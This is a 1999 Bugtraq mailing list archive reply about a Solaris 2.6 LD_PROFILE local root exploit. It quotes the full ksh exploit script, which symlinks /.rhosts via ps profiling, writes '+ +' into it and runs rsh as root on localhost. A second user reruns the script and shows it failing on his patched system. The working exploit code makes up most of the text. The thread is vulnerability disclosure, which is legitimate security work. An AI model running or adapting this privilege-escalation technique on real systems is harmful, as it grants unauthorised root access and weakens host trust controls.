Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: LD_PROFILE local root exploit for solaris 2.6

From: bsides () TOWERY COM (Brock Sides)
Date: Thu, 23 Sep 1999 16:43:51 -0500

On Wed, 22 Sep 1999, Steve Mynott wrote:


works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i


Not on my system:

[[brock@agfa brock]$ uname -a
SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20
[[brock@agfa brock]$ cat r00t.sh
#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i

[[brock@agfa brock]$ ./r00t.sh
   PID TTY      TIME CMD
 22565 pts/5    0:00 r00t.sh
 22484 pts/5    0:01 bash
./r00t.sh[8]: /.rhosts: cannot create
permission denied
[[brock@agfa brock]$

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides () towery com
Previous By Date Next
Previous By Thread Next

Current thread: